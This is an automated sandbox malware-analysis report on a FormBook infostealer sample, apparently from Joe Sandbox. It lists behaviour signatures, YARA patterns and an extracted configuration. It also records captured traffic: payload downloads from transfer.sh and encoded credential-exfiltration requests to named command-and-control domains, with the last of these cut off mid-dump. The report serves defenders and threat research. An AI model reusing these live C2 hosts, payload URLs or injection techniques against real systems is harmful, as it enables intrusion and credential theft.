Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
Analysis ID:720157
MD5:3e26dd2ef6dc0be5838e1eac6b668846
SHA1:85581b892756aeb1c453f34464b1f40fa92ff91e
SHA256:221207a0c2f44d04a8c605e5ab6f4585d683daf11671dc6b9fb6a12e3214769a
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
.NET source code references suspicious native API functions
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe (PID: 5148 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe MD5: 3E26DD2EF6DC0BE5838E1EAC6B668846)
    • aspnet_compiler.exe (PID: 5020 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 644 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.suatvthainguyen.buzz/obc0/"], "decoy": ["ZjclkfTy1nqU", "sXZhy2crEuB/rUzSxLptDVNcNzQ=", "ck1FI0gC5KFwF/D9Yj46lPTa6w==", "42k+tkDixYLj8Hj2JLnoXA==", "Xi/Fcx2+VzH7oQ==", "ALWQcoIm9qi/ysm3c+AzBYQg", "zVYi9iHnwoyWJ+MIvGIbdrI74w==", "l2InDjHPqT780JFZtA==", "YC0RHirarHuVp6OTGhwwxbptEGEJEQ==", "BqRbKUgCz2VHR0lbEKy2Uw==", "YP/p7RGcfw9DYfARrYU=", "HMe4sMZsRwfYURFhGf2KnLBYIl/JBnI=", "kDEcbvuuhSSocC3r", "BdnGTpee8ePq9wv0", "YTYa+yXDhh7qvEelWkDrQw==", "FZtkxWUvtmmd", "t1gxeQHbaxdQWy6poRYw", "1GMUbRrIvozjhn0=", "ONzHsuOGV/A2WjHsuh4ylPTa6w==", "UAXYR+uRahqUYTfy", "yW5rd6RWLvbxExj6", "+J0nwloF8OXkBvmHUjbiAIsY/A==", "XhkE/wmrdT1A36bu6KKqSw==", "FufczeuGYec2XzfbTLj5UQvpa77X", "23UigCjyz4XcAwYW6KKqSw==", "qzcKtebzgzOE", "B+3m2M9r++2wV2o=", "Jbpx3H4q+b1JbC+poRYw", "Pffk3QHjiSmA", "BrafEas+GNIzYi+poRYw", "76WG3W8m7PhDYyGwHZM=", "chrNLrdTM9kdMM9PMQy3Xg7pa77X", "EOXXx+WRgAlKcwL2sB8y", "e0Mf7AWRZESOHh2uoY0=", "avnSV6iVbC+C", "R8qfK9SKUQtjeE2xXMDrXA==", "T9/FvuGkOh8rIu2KD4GczAjP4Q==", "E9/Nx+N/bxsMp2wKvpg=", "jkEsLkbqtoBQ8fNmDOSElPTa6w==", "U/PXpqxaO/BzfTCpoRYw", "FqF18phGFMMTcB0VoQ==", "o0z7avaUfA8zRwjyvGIbdrI74w==", "YBn0UbinaBQ=", "v3thnk4vtmmd", "Ten3JNj1TzgxvA==", "pXlWtkbo2Z00FRr7vzc4", "WOeT8Hwr/NCXdje7qpA=", "bQfu0/WsiRlZYlRwU8IpB5c7CR/f", "gyvOROz6VzH7oQ==", "aiPWqL1wQ+CnQ/C2q5I=", "YP3ZxOCTXzy3UD+9qZA=", "lTb5zNZ0//0Gqw==", "fRr52wfBmCeeKTmTU33kL2A=", "aBf9ys6adxQcfoX4pg==", "oYU7DB7Lmjq31qNGwX3kL2A=", "WwXw1uypllIesTy3ZWZ6KHQ=", "bfWqgpVFG/6LGNMa0Ly8VA==", "ILKPjrJkNt6Pbj7Qwpo=", "6cO7NuzffDWF", "74hbz30nEZ090qHFMRgulPTa6w==", "yZ+LkIUvDNsxlVg88mBykhbpa77X", "PRHeRpKb8ePq9wv0", "LPzp1uy0mFiuXW4=", "uVYsoirSnJjjc3c="]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.571202230.00000000005D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.571202230.00000000005D0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x65f1:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1f230:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa97f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x17ea7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000003.00000002.571202230.00000000005D0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x17ca5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17751:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17da7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x17f1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa54a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1699c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de87:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ef9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.571202230.00000000005D0000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x1a169:$sqlite3step: 68 34 1C 7B E1
    • 0x1ace1:$sqlite3step: 68 34 1C 7B E1
    • 0x1a1ab:$sqlite3text: 68 38 2A 90 C5
    • 0x1ad26:$sqlite3text: 68 38 2A 90 C5
    • 0x1a1c2:$sqlite3blob: 68 53 D8 7F 8C
    • 0x1ad3c:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000000.365503115.000000000E427000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 18 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      Timestamp:144.76.136.153192.168.2.4443497002018856 10/11/22-05:55:40.046635
      SID:2018856
      Source Port:443
      Destination Port:49700
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeReversingLabs: Detection: 21%
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000002.571202230.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.365503115.000000000E427000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.571268092.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Machine Learning detection for sample
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeJoe Sandbox ML: detected
      Source: 00000003.00000002.571202230.00000000005D0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.suatvthainguyen.buzz/obc0/"], "decoy": ["ZjclkfTy1nqU", "sXZhy2crEuB/rUzSxLptDVNcNzQ=", "ck1FI0gC5KFwF/D9Yj46lPTa6w==", "42k+tkDixYLj8Hj2JLnoXA==", "Xi/Fcx2+VzH7oQ==", "ALWQcoIm9qi/ysm3c+AzBYQg", "zVYi9iHnwoyWJ+MIvGIbdrI74w==", "l2InDjHPqT780JFZtA==", "YC0RHirarHuVp6OTGhwwxbptEGEJEQ==", "BqRbKUgCz2VHR0lbEKy2Uw==", "YP/p7RGcfw9DYfARrYU=", "HMe4sMZsRwfYURFhGf2KnLBYIl/JBnI=", "kDEcbvuuhSSocC3r", "BdnGTpee8ePq9wv0", "YTYa+yXDhh7qvEelWkDrQw==", "FZtkxWUvtmmd", "t1gxeQHbaxdQWy6poRYw", "1GMUbRrIvozjhn0=", "ONzHsuOGV/A2WjHsuh4ylPTa6w==", "UAXYR+uRahqUYTfy", "yW5rd6RWLvbxExj6", "+J0nwloF8OXkBvmHUjbiAIsY/A==", "XhkE/wmrdT1A36bu6KKqSw==", "FufczeuGYec2XzfbTLj5UQvpa77X", "23UigCjyz4XcAwYW6KKqSw==", "qzcKtebzgzOE", "B+3m2M9r++2wV2o=", "Jbpx3H4q+b1JbC+poRYw", "Pffk3QHjiSmA", "BrafEas+GNIzYi+poRYw", "76WG3W8m7PhDYyGwHZM=", "chrNLrdTM9kdMM9PMQy3Xg7pa77X", "EOXXx+WRgAlKcwL2sB8y", "e0Mf7AWRZESOHh2uoY0=", "avnSV6iVbC+C", "R8qfK9SKUQtjeE2xXMDrXA==", "T9/FvuGkOh8rIu2KD4GczAjP4Q==", "E9/Nx+N/bxsMp2wKvpg=", "jkEsLkbqtoBQ8fNmDOSElPTa6w==", "U/PXpqxaO/BzfTCpoRYw", "FqF18phGFMMTcB0VoQ==", "o0z7avaUfA8zRwjyvGIbdrI74w==", "YBn0UbinaBQ=", "v3thnk4vtmmd", "Ten3JNj1TzgxvA==", "pXlWtkbo2Z00FRr7vzc4", "WOeT8Hwr/NCXdje7qpA=", "bQfu0/WsiRlZYlRwU8IpB5c7CR/f", "gyvOROz6VzH7oQ==", "aiPWqL1wQ+CnQ/C2q5I=", "YP3ZxOCTXzy3UD+9qZA=", "lTb5zNZ0//0Gqw==", "fRr52wfBmCeeKTmTU33kL2A=", "aBf9ys6adxQcfoX4pg==", "oYU7DB7Lmjq31qNGwX3kL2A=", "WwXw1uypllIesTy3ZWZ6KHQ=", "bfWqgpVFG/6LGNMa0Ly8VA==", "ILKPjrJkNt6Pbj7Qwpo=", "6cO7NuzffDWF", "74hbz30nEZ090qHFMRgulPTa6w==", "yZ+LkIUvDNsxlVg88mBykhbpa77X", "PRHeRpKb8ePq9wv0", "LPzp1uy0mFiuXW4=", "uVYsoirSnJjjc3c="]}
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49699 version: TLS 1.2
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\XVXBDDGDGGDG.pdb source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\FREAKYFRIDAY.pdbBSJB source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.315681620.00000000054F0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314925377.0000000002677000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.314711737.0000000000FD7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.312969278.0000000000E34000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000003.399528771.0000000000888000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000003.402502298.0000000000A29000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.314711737.0000000000FD7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.312969278.0000000000E34000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000003.399528771.0000000000888000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000003.402502298.0000000000A29000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\FREAKYFRIDAY.pdb source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.315681620.00000000054F0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314925377.0000000002677000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: aspnet_compiler.pdb source: wlanext.exe, 00000003.00000002.571563301.000000000078D000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573238530.0000000003073000.00000004.10000000.00040000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\XVXBDDGDGGDG.pdbBSJB source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00172D50 FindFirstFileW,FindNextFileW,FindClose,3_2_00172D50
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00172D49 FindFirstFileW,FindNextFileW,FindClose,3_2_00172D49
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_00AA2C95
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_00AA02E0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_00AA28C4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_00AA22DC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_00AA0304
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_00AA031C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi3_2_00168950
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi3_2_0016894F

      Networking

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeDomain query: www.bloopacts.live
      Source: C:\Windows\explorer.exeNetwork Connect: 167.235.29.175 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.luregirl.net
      Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.167 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.augusta.broker
      Source: C:\Windows\explorer.exeNetwork Connect: 69.57.163.50 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 52.60.87.163 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.negerbajs.info
      Source: C:\Windows\explorer.exeNetwork Connect: 167.179.103.237 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.skyepattest.com
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2018856 ET TROJAN Windows executable base64 encoded 144.76.136.153:443 -> 192.168.2.4:49700
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: www.suatvthainguyen.buzz/obc0/
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: global trafficHTTP traffic detected: GET /get/at0HRq/COOL2.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /get/NNwCGT/DLL.txt HTTP/1.1Host: transfer.sh
      Source: global trafficHTTP traffic detected: GET /obc0/?-Zbh98=V2kSpVpGpqmsc+zV99/vwEPQm6AjbD0sNlmHlMce7g5oKKN3NgpJQJsKfnUSGJnURE4hRqcigFYsP8mgf+TOZi6v6bw37RqyMQ==&C0=X82hHfExC6QP HTTP/1.1Host: www.negerbajs.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /obc0/?-Zbh98=ymzEQwRFXCPDCi+CRQJb7/Cu/KCeuwmnwGnTOFfe8Wu9oS0w58wfIKm/BUV3lMrC1MN0SKPFf3LORs93kZV7msxn8x5u5Wnabg==&C0=X82hHfExC6QP HTTP/1.1Host: www.augusta.brokerConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /obc0/?-Zbh98=QEPeK6C4+xU1T+Zv89RyXnFvtkuTgj7CyQVR6lB98YiPEjAwu2VabqstxXG4WeniE5n6fSCr36EXz2ZAkGy4VKLMfvQeNDQPqw==&C0=X82hHfExC6QP HTTP/1.1Host: www.luregirl.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /obc0/?-Zbh98=MMZqO1I08y1GBRfD5BQQX3BCGY/GGPyfy+PmyLieMA7AvKnTbkXoUfvxfVWp1ohOvSFQ0Ck6defUcVisMCvldqUqNSR/syiy4w==&C0=X82hHfExC6QP HTTP/1.1Host: www.bloopacts.liveConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /obc0/?-Zbh98=7PSH/Ln00kiEZ+8VHNPsGnjemOaV3QQvmjWzLH8ChjGT6OrVSUax7xbhQJ4P9gQznTCEUU1HjkXGkkJ8y3lbGhe/UOddQQeZUw==&C0=X82hHfExC6QP HTTP/1.1Host: www.skyepattest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
      Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
      Source: global trafficHTTP traffic detected: POST /obc0/ HTTP/1.1Host: www.augusta.brokerConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.augusta.brokerUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.augusta.broker/obc0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 2d 5a 62 68 39 38 3d 28 6b 62 6b 54 46 49 4f 65 79 54 6e 50 79 62 42 63 47 42 6e 39 38 53 64 6e 35 32 4f 6a 53 32 6d 31 68 7e 71 46 79 4b 71 30 6c 65 30 75 46 51 75 39 61 4d 37 4c 5f 32 6f 56 45 68 37 37 39 37 66 73 76 78 6e 53 66 33 6b 54 42 43 6c 52 50 4a 33 75 2d 64 6f 6d 4f 6b 77 31 52 30 39 32 46 79 53 58 79 49 76 42 38 36 36 35 67 34 31 71 6a 74 45 52 39 69 59 4a 7a 6f 31 73 30 4b 61 69 4a 31 57 63 74 4b 6b 79 67 35 44 43 66 39 49 38 6a 53 6c 39 73 43 5a 4d 55 37 65 35 75 30 5a 31 6c 6f 57 61 32 4c 58 73 34 66 73 4e 51 34 64 79 69 64 75 55 77 75 6e 4f 33 28 4a 54 67 31 30 7a 75 6c 46 52 79 62 36 57 79 31 6a 42 50 41 6c 78 4f 6f 67 67 49 4c 72 6d 34 54 59 64 79 61 4c 59 46 71 59 61 6d 6c 35 30 67 56 6a 32 46 58 58 78 51 4f 42 68 50 78 4f 64 59 30 38 57 6a 36 63 47 68 5a 57 63 52 34 35 6f 32 71 59 28 33 64 6b 36 50 6c 59 58 68 38 43 5a 58 69 5f 47 46 72 6a 31 42 61 4d 77 76 65 55 4c 59 75 52 74 63 65 55 54 6d 72 50 73 7a 55 6d 4d 69 43 46 6a 62 4d 4c 4f 67 69 46 42 41 44 47 48 45 78 32 69 78 30 74 6e 65 53 4b 6f 45 6b 7a 46 4c 33 73 54 54 4b 6e 73 52 68 69 36 32 55 71 78 48 35 30 38 71 61 4b 62 4b 53 39 68 6d 44 4e 78 78 6b 4a 6c 31 76 38 38 63 73 2d 32 35 55 70 41 55 72 36 53 57 72 64 4b 32 79 4e 65 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: -Zbh98=(kbkTFIOeyTnPybBcGBn98Sdn52OjS2m1h~qFyKq0le0uFQu9aM7L_2oVEh7797fsvxnSf3kTBClRPJ3u-domOkw1R092FySXyIvB8665g41qjtER9iYJzo1s0KaiJ1WctKkyg5DCf9I8jSl9sCZMU7e5u0Z1loWa2LXs4fsNQ4dyiduUwunO3(JTg10zulFRyb6Wy1jBPAlxOoggILrm4TYdyaLYFqYaml50gVj2FXXxQOBhPxOdY08Wj6cGhZWcR45o2qY(3dk6PlYXh8CZXi_GFrj1BaMwveULYuRtceUTmrPszUmMiCFjbMLOgiFBADGHEx2ix0tneSKoEkzFL3sTTKnsRhi62UqxH508qaKbKS9hmDNxxkJl1v88cs-25UpAUr6SWrdK2yNeQ).
      Source: global trafficHTTP traffic detected: POST /obc0/ HTTP/1.1Host: www.augusta.brokerConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.augusta.brokerUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.augusta.broker/obc0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 2d 5a 62 68 39 38 3d 28 6b 62 6b 54 46 49 4f 65 79 54 6e 4d 46 48 42 52 56 35 6e 6c 73 53 64 28 35 32 4d 6a 53 32 6c 31 68 7e 6d 46 32 37 79 31 53 69 30 75 51 30 75 7e 73 51 37 49 5f 32 6e 4e 55 68 33 31 64 37 76 73 76 78 52 53 61 50 6b 54 46 71 6c 52 50 5a 33 75 4e 46 72 6e 4f 6b 32 35 78 30 38 79 46 79 48 58 79 55 37 42 2d 7e 36 35 69 41 31 72 55 35 45 52 75 4b 62 44 7a 6f 77 6a 55 4c 53 37 35 31 53 63 74 4b 47 79 67 35 74 43 63 46 49 67 44 43 6c 76 65 61 61 46 55 37 58 31 4f 31 6e 36 46 6b 5a 57 46 75 6b 6b 72 48 6d 47 58 64 4f 38 6a 5a 71 43 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: -Zbh98=(kbkTFIOeyTnMFHBRV5nlsSd(52MjS2l1h~mF27y1Si0uQ0u~sQ7I_2nNUh31d7vsvxRSaPkTFqlRPZ3uNFrnOk25x08yFyHXyU7B-~65iA1rU5ERuKbDzowjULS751SctKGyg5tCcFIgDClveaaFU7X1O1n6FkZWFukkrHmGXdO8jZqCQ).
      Source: global trafficHTTP traffic detected: POST /obc0/ HTTP/1.1Host: www.luregirl.netConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.luregirl.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.luregirl.net/obc0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 2d 5a 62 68 39 38 3d 64 47 6e 2d 4a 4e 4c 62 30 44 49 31 54 76 35 55 6f 6f 31 62 66 6d 68 2d 7e 6d 6e 68 68 51 4b 68 36 57 73 68 77 6d 70 31 28 37 66 48 47 68 4d 50 71 78 67 4a 66 2d 73 51 79 56 7e 30 4d 50 72 75 46 4a 28 39 66 43 71 63 7a 59 74 70 6f 6c 55 50 71 68 75 2d 52 36 79 33 62 74 45 33 49 47 51 47 6c 56 71 50 35 4a 75 77 4a 5f 76 50 67 63 45 76 56 49 6a 4e 63 6c 58 30 72 64 45 50 73 42 28 31 7e 53 39 44 34 74 57 55 37 50 75 41 56 72 77 65 51 70 55 34 65 42 4e 6e 5a 65 4c 52 55 69 61 6e 48 51 77 4a 74 55 65 48 67 79 55 58 31 48 37 49 74 79 42 4d 58 67 55 72 47 72 6b 6d 34 39 43 64 49 53 28 70 59 63 56 61 65 71 39 59 58 48 49 41 49 6d 5a 7a 62 6b 52 71 79 77 32 51 53 50 28 69 62 32 6d 2d 71 4c 4f 2d 52 65 6c 49 75 6b 52 55 45 54 76 6f 58 75 49 6c 73 4b 4f 52 68 46 66 73 37 76 74 39 7e 7a 6b 47 31 79 76 79 36 36 71 55 68 32 6d 65 72 52 4b 47 33 45 59 50 56 34 65 71 73 51 38 5f 7e 4c 62 76 63 6b 55 70 59 37 53 76 68 44 42 59 42 78 58 63 72 44 30 73 32 39 30 36 6c 30 30 77 28 36 53 48 41 4d 38 33 56 70 6e 4a 75 47 69 61 50 39 43 56 62 6b 63 75 68 45 4b 4e 74 67 6c 37 5a 35 7a 61 37 64 28 5a 66 41 71 31 6c 71 36 65 4c 49 30 34 6a 6f 43 65 69 59 34 61 58 37 64 66 57 75 7a 58 4b 44 6c 73 4e 75 38 76 50 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: -Zbh98=dGn-JNLb0DI1Tv5Uoo1bfmh-~mnhhQKh6Wshwmp1(7fHGhMPqxgJf-sQyV~0MPruFJ(9fCqczYtpolUPqhu-R6y3btE3IGQGlVqP5JuwJ_vPgcEvVIjNclX0rdEPsB(1~S9D4tWU7PuAVrweQpU4eBNnZeLRUianHQwJtUeHgyUX1H7ItyBMXgUrGrkm49CdIS(pYcVaeq9YXHIAImZzbkRqyw2QSP(ib2m-qLO-RelIukRUETvoXuIlsKORhFfs7vt9~zkG1yvy66qUh2merRKG3EYPV4eqsQ8_~LbvckUpY7SvhDBYBxXcrD0s2906l00w(6SHAM83VpnJuGiaP9CVbkcuhEKNtgl7Z5za7d(ZfAq1lq6eLI04joCeiY4aX7dfWuzXKDlsNu8vPw).
      Source: global trafficHTTP traffic detected: POST /obc0/ HTTP/1.1Host: www.luregirl.netConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.luregirl.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.luregirl.net/obc0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 2d 5a 62 68 39 38 3d 64 47 6e 2d 4a 4e 4c 62 30 44 49 31 53 63 52 55 70 37 74 62 56 47 68 2d 78 47 6d 72 68 51 4c 49 36 57 73 6c 77 69 52 6c 71 63 37 48 47 30 67 50 71 44 59 4a 61 2d 73 54 36 31 7e 34 50 5f 72 42 46 4a 28 68 66 47 69 63 7a 63 46 70 6f 6b 6b 50 71 53 57 35 57 36 79 31 58 4e 45 77 61 32 52 4d 6c 56 47 39 35 4e 6d 77 4a 39 6e 50 67 50 63 76 56 65 7e 62 59 46 58 33 75 64 45 45 6a 68 28 35 7e 53 39 68 34 74 57 2d 37 